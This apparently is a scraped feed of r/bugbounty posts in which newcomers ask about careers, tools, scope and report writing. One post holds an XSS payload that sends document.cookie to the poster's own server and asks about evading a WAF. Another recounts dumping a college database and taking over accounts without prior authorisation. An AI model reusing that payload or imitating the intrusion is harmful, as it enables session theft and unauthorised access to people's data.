How could bug hunting benefit me?
I want to be clear about that my primary goal is to make money, which I believe is what most of us work for in the first place.
I'm not fully certain yet about the exact path I want to pursue, but bug hunting and penetration testing caught my attention, so I created a roadmap that includes:
Networking basics
Database fundamentals
The CISSP All-in-One Exam Guide (which has been the most valuable and time-consuming so far)
I've completed about 70% of this plan. However, I'm still feeling a bit uncertain about the direction I'm heading, as I'm mostly studying general security concepts at this point.
I’m seeking advice on whether I should focus more on penetration testing and bug bounty hunting. There are mixed opinions—some say it's nearly impossible to find work or discover bugs, while others believe there are opportunities, especially with the evolving landscape of technology, quantum computing, and AI, which could drastically impact security.
Would dedicating my time to learning more about bug bounty hunting and penetration testing be financially rewarding, or would I be wasting my time? Even if I don't earn money, would the skills I gain be valuable, or should I consider other paths for better returns on my time?
https://redd.it/1fnsepu
@r_bugbounty
subdomain gets redirected to a totally different website
I found this subdomains that redirects me to a totally different website. Example: subdomain.domain.com gives me bettingsite.com
I am just curios about this behavior, does this means they have been hacked?
Is this worth reporting?.
I made a quick look on the response and I found this a javascript code that is possibly the culprit.</script>
<script type='text/javascript' language='JavaScript'>window.onload = function() {
if(clickTracking && typeof track_onclick == 'function') track_onclick("trackingcode");
top.location.href = "http://bettingsite.com";};
</script>
https://redd.it/1fnmkbi
@r_bugbounty
Would you exploit it further ?
if you find an sql injection , would you try to exploit it further ( by exfiltrating all tables for examples ) to demonstrate impact or just be satisfied by reporting a simple PoC that demonstrates it's there.
https://redd.it/1fn3n0o
@r_bugbounty
Need help with really strange behavior on IBM DataPower.
https://redd.it/1fmycu6
@r_bugbounty
Newbie question: How do I start finding bug bounty programs for beginners (low-hanging fruit)?
I have completed CTFs on HackerOne and have been practicing on PortSwigger Labs. I'm eager to work on real-world websites and start hunting bugs. How can I find beginner-friendly bug bounty programs?
https://redd.it/1fmr3bd
@r_bugbounty
New free tool for subdomain enumeration and reverse DNS search
Hey! I just found a new tool for recon https://search.reconwave.com/about
Apparently also including reverse NS and TXT search in higher plans
https://redd.it/1fmbgnf
@r_bugbounty
Is it useless to test XSS on these frameworks?
Is it true that if we find web application in bug bounty that is built with several frameworks such as react, vue, angular, and ember js, we don't need to test for XSS? I once read an article that said that testing for XSS there would be useless because we'll never find XSS there, if we do, it will be very rare. Is that true?
https://redd.it/1fly9bn
@r_bugbounty
Fedora vs Mac OS which performs better?
Im trying to look in detail about which 0S nowdays will fit better and also run BBH tools smoother.
Having in mind that both OS will have tools instaled localy on them
And also the fedora will be installed as main OS . Does break normally?
Side question, which fedora spin/version is the one really for cyber sec? its workstation the standar for it?
Thanks for the replies!
https://redd.it/1flufwb
@r_bugbounty
Email Spam Attack
I potentially found my first reportable bug! I wanted a little bit of advice on writing a report.
I discovered a bug that allows me to send hundreds of emails to any email of my choosing, and it only requires one HTTP request. It seems like exploiting this is a good way to get blocked by spam. Theoretically, I could automate something to do this multiple time, and get the website blocked on a given email service. I plan to be more thorough in my report, but am I missing any key details on how else this could be disruptive for the website? Is it worth writing up the report for this?
https://redd.it/1flrspp
@r_bugbounty
I Hacked my college database!
So long story short,I graduated in 2021 from that particular college.Today I decided to just mess around their website and wanted to see what I could find.1 hour into searching ,I came across a login portal which was designed for teachers to request for a leave ,which later had to be be approved by the HOD.
So without going into detail I managed to dump the database backend source code.This was probably due to improper permissions.
One of the files had the database creds,which made access all their data,which includes emails,phone numbers,reason for their leave and all the user passwords.
I later could take over any account in the portal.I decided to report this to my professor who was the CS HOD at the time.
I was really excited,and she tells me it’s a student project on a trial basis which they are improving and she will look into it.She also asked to me test their other servers.
This decreased my excitement a little,what do guys think,was it a good find?
https://redd.it/1fli7bn
@r_bugbounty
JavaScripts
How do you guys analysis JS code files ?
What do u look for in these files ?
https://redd.it/1flfdzi
@r_bugbounty
what's wrong with amass ?
Whenever i tried to find subdomains using amass , It show unwanted result any solution ?
https://preview.redd.it/d9mxhslxfwpd1.png?width=1600&format=png&auto=webp&s=2eac346f4ba67b082a81f650c309eccae2f19ec7
https://redd.it/1fl4oek
@r_bugbounty
Seeks an advise
hello guys, can you help please which is better doing bug hunting as fulltime or work in pentest job for 400$ / month
i'm from 3rd world country
https://redd.it/1fkyg8e
@r_bugbounty
Learning Web Frameworks for bug bounty
I want to learn a web development framework before jumping into bug bounty hunting , which do you guys recommend ? Node.js or dot net core ?
https://redd.it/1fkwu2h
@r_bugbounty
Is bug bounty a scam ?
What do you think about the bug bounty programs that try to scam you , and is there an approach I can follow to avoid being scammed?
https://redd.it/1fku0sh
@r_bugbounty
1st ever bug turned out to be Duplicate
Soo, guys I reported a bug at hacker1 my 1st ever bug & after many months/years of learning, I thought this is it... I have done it, but no after a week today I got their reply that it's a duplicate... I am sad ig that it turned out to be a duplicate, some of you might have had the same experience in past, what did you tell yourself & then how did your life turn out to be ??
https://redd.it/1fnn7ne
@r_bugbounty
Best and straight to the point bbh roadmap?
If you experience bbh have to do it all over again but straight to the point roadmap in a way that you'll learn the essentials to start trying, looking and learning by practicing. Which will those courses/skills/tools will you roadmap as the at least needed or minimum required to start the bbh journey .
I'm asking having in mind that cyber sec it's a huge field with a lot of skills needed for many things but for this instance, center on bbh. So people won't overload with maybe things that can learn later or in the way.
Thanks
https://redd.it/1fn9nu2
@r_bugbounty
what does this means?
a program i hunt on makes this sentence in out of scope : Account squatting by preventing users from registering with certain email addresses.
what he means about it ?
i tried to translate it but i didnt get it could someone explain it please
https://redd.it/1fmvx5g
@r_bugbounty
How to bug bounty (pls reply)
Hey hackers,
I'm a noobie who started learning web penetration testing.
How can I be a master of web hacking,
I wanna explore bug bounty programs but I still feel idk much yet.
Tho I have solved like so many topics on portswigger, but that's only on controlled environment. Also I have hacker on hack the box.
What should I do next?
https://redd.it/1fmwoir
@r_bugbounty
Newbie Question: Is this reflected XSS in a cookie enough to prove impact?
https://redd.it/1fme7ke
@r_bugbounty
Cohackers
Does anyone know about the CoHackers website? i haven't found anyone talking about it—no YouTube videos no Reddit subs nothing I'm curious about this
Link - https://cohackers.co/
https://redd.it/1fm3h85
@r_bugbounty
XSS doubt
So I executed this command on the console of the website
document.body.innerHTML = "<iframe src='https://my-server.app/log?c=" + document.cookie + "'></iframe>";
and was able to get the cookie on my server.
What do I do from here on? I have tried pasting the payload into the url, but the WAF locks me out every single time. Do I look for input fields to execute this payload on? Are there other ways to take advantage of this? Sorry if dumb question, I'm new.
https://redd.it/1flvlm1
@r_bugbounty
Using YouTube to steal your files
https://lyra.horse/blog/2024/09/using-youtube-to-steal-your-files/
https://redd.it/1flthpf
@r_bugbounty
Pentest Jobs vs BBH nowdays
Anyone can share their professional experience and advice on both sides or maybe someone who switch from one to another or even someone who entered Cybersec just for bbh and made a full time job out of it.
Thanks for all replys!
https://redd.it/1flk5oj
@r_bugbounty
False Positive ?
Hi Every One ... Can Someone Help to find False Positive on OWASP Juice Shop .
Thank you Really appreciate
# r/bugbounty
https://redd.it/1flfyi4
@r_bugbounty
I would like to become a bug bounty hunter…where do I start?
Hello everyone
I am very interested in becoming a bug bounty hunter and would like to know where I should start? Currently I am studying HTB CTPS and afterwards I plan on studying their CBBH course. I have signed myself up on H1 and would like to know what I should do as a beginner.
I am aware of in scope (allowed) and out of scope (not allowed) but that is all I know about what scopes are or is there something more I should know? I would like to know what tools would I need to have installed on my kali linux vm to make bug bounty hunting easier? Are there any good free tools or any good community tools via github? Or am I being too eager?
I would like to dive into bug bounty hunting as a way to become more experienced and to build up skills and be able to earn some money.
Any advice is greatly appreciated and I thank you in advance for your kindness.
https://redd.it/1fl8cxf
@r_bugbounty
Runing BURPSUITE on MAC OS
Hi im looking into knowing how ram demaning could burpsuite be? im planing to get a macbbook air m1 with 8 ram . ive read that it could take from 1gb to even 12 ram? or its just about not over using extentions and overload work ?
https://redd.it/1fkx85b
@r_bugbounty
Has anyone ever gotten a payout directly from the company?
I've heard a few stories about companies not paying out and it has me a bit concerned. They basically tell you it's not a bug it's a feature then patch the issue.
https://redd.it/1fkxrwi
@r_bugbounty
Hi! I got a question on using a MACBOOKAIR M1 FOR BBH
Hi im sorry to bother with this question but i need to know if MACBOOK AIR M1/8RAM/256SSD be enough to run all only BBH tools such as burp and the other esentials/must have, installed directly in macbook.
Would 8 ram be enough for the work flow?
I dont want to VM KALI or something like that localy nor cloudbased or linux cloud enviroment
https://redd.it/1fku6c6
@r_bugbounty
Are you guys hunting on android apps? If yes, what kind of vulnerabilities can be reported?
I have been focusing on native Android apps, mainly reporting issues found through source code analysis, such as data exfiltration via exported activities and broadcasts. Dynamic analysis is becoming more challenging, as reporting the clear transmission of confidential data (e.g., access tokens) in Logcat is often out of scope. Most submissions requiring an app installation are classified as medium or low severity, especially on platforms like Intigriti and Bugcrowd. Even account takeover vulnerabilities by bypassing Android disambiguation are rated with a severity of 3.6 or below 5.0.
If anyone can share tips on attack surfaces in Android apps, it would be really helpful. The biggest struggle these days is educating triagers. Most of the time, they rate bugs with lower severity on Intigriti and Bugcrowd, although jack_bugcrowd seems to have some knowledge in Android pentesting.
Since the beginning of this year, I've earned around $10,000 from Android app bug bounties, with most vulnerabilities related to data exfiltration via exported activities and hardcoded secrets. Are there any other vulnerabilities I should focus on in both static and dynamic analysis? I need guidance to continue in the right direction. Thanks for reading my post!
https://redd.it/1fkr5kp
@r_bugbounty
